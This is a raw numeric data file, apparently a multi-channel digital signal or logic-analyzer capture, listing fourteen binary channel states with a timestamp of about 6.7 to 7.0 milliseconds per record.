1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7333440e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7333720e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7333960e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7334480e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7334720e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7334760e-03 1,1,0,0,0,1,0,0,0,1,0,0,1,0,6.7335000e-03 1,1,0,0,0,1,0,0,0,1,0,0,0,0,6.7335240e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7335320e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7335480e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7335720e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7336000e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7336240e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7336520e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7336760e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7337000e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7337240e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7337480e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7337800e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7338040e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7338280e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7338520e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7338800e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7339040e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7339320e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7339560e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7339800e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7340040e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7340280e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7340520e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7340800e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7341040e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7341320e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7341560e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7341800e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7342040e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7342280e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7342520e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7342800e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7343040e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7343320e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7343560e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7343800e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7344040e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7344280e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7344520e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7344800e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7345040e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7345320e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7345560e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7345800e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7346040e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7346320e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7346600e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7346840e-03 1,1,0,0,0,0,0,0,0,0,0,0,1,0,6.7347080e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,0,6.7347320e-03 1,1,0,0,0,0,0,0,0,0,0,0,0,1,6.8592760e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,1,6.8594800e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,1,6.8595000e-03 0,0,1,0,0,0,0,0,0,0,0,1,0,1,6.8595320e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,1,6.8595560e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,1,6.8598400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,1,6.8598600e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,1,6.8598840e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,1,6.8599080e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,1,6.8599320e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,1,6.8599560e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,1,6.8600080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,1,6.8600320e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,1,6.8600360e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,1,6.8600600e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,1,6.8600840e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,1,6.8600920e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8601080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8601320e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8601560e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8601800e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8601880e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,6.8602360e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8602600e-03 0,0,1,0,0,1,0,0,0,0,0,0,0,0,6.8602640e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8602680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8602840e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8603080e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8603560e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8603800e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8604320e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8604600e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8605080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8605320e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8605560e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8605800e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8606080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8606320e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8606360e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,6.8606840e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8607080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8607160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8607320e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8607560e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8607800e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8608080e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8608320e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8608600e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8608840e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8609080e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8609320e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8609560e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8609800e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8610080e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8610320e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8610600e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8610840e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8611080e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8611320e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8611560e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8612080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8612320e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8612360e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,6.8612600e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8612840e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8612920e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8613080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8613320e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8613560e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8613800e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8614080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8614320e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8614600e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8614840e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8615080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8615320e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8615560e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8615800e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8616080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8616320e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8616600e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8616840e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8617080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8617320e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8617560e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8617800e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8617880e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,6.8618360e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8618600e-03 0,0,1,0,0,1,0,0,0,0,0,0,0,0,6.8618640e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8618680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8618840e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8619080e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8619320e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8619560e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8619800e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8620080e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8620120e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,6.8620600e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8620840e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8620920e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8621080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8621320e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8621560e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8621800e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8622360e-03 0,0,1,0,0,0,0,0,0,1,0,0,0,0,6.8622600e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8622640e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,6.8622840e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8623080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8623160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8623320e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8623560e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8623640e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,6.8624040e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8624280e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8624360e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8624560e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8624800e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8625080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8625320e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8625560e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8625800e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8626280e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8626560e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8627080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8627320e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8627800e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8628080e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8628560e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8628800e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8629080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8629320e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8629560e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8629800e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8630080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8630280e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8630560e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8630800e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8631080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8631320e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8631560e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8631800e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8632080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8632280e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8632600e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8632840e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8633080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8633360e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8633400e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,6.8633880e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8634120e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8634200e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8634360e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8634600e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8635080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8635360e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8635880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8636120e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8636600e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8636840e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8637080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8637320e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8637600e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8637840e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8638120e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8638360e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8638600e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8638840e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8639080e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8639320e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8639400e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,6.8639880e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8640120e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8640200e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8640360e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8640600e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8640840e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8641080e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8641360e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8641600e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8641840e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8642120e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8642360e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8642600e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8642880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8643120e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8643160e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,6.8643640e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8643880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8643960e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8644120e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8644360e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8644600e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8644880e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8645120e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8645400e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8645880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8646120e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8646360e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8646600e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8647160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8647400e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8647880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8648120e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8648600e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8648880e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8649120e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8649400e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8649640e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8649880e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8649920e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,6.8650360e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8650600e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8650680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8650880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8651120e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8651400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8651640e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8651880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8652120e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8652640e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8652880e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8653120e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8653400e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8653640e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8653880e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8654120e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8654360e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8654600e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8654880e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8655120e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8655400e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8655880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8656120e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8656200e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,6.8656360e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,6.8656600e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8656680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8656880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8657120e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8657400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8657640e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8658120e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8658360e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8658600e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8658880e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8659400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8659640e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8660120e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8660360e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8660920e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8661120e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8661400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8661640e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8661880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8662120e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8662360e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8662600e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8662880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8663120e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8663400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8663640e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8663880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8664120e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8664360e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8664600e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8664880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8665120e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8665400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8665640e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8665880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8666120e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8666360e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8666600e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8666880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8667120e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8667400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8667640e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8667880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8668120e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8668360e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8668600e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8668880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8669120e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8669400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8669640e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,6.8669880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,6.8670120e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,1,6.9911800e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,1,6.9914120e-03 1,0,1,0,0,0,0,0,0,0,0,1,0,1,6.9914400e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,1,6.9914640e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,1,6.9917640e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,1,6.9917880e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,1,6.9918160e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,1,6.9918400e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,1,6.9918920e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,1,6.9919160e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,1,6.9919200e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,1,6.9919640e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,1,6.9919880e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,1,6.9919960e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9920120e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9920400e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9920680e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9920920e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9921160e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9921400e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9921640e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9921720e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9922160e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9922400e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9922480e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9922920e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9923160e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9923200e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9923400e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9923640e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9923880e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9924160e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9924400e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9924680e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9924720e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9925160e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9925400e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9925640e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9925880e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9925960e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9926400e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9926680e-03 1,0,1,0,0,1,0,0,0,0,0,0,0,0,6.9926720e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9926760e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9926920e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9927160e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9927400e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9927640e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9927880e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9928160e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9928400e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9928680e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9928920e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9929160e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9929400e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9929640e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9929880e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9930160e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9930400e-03 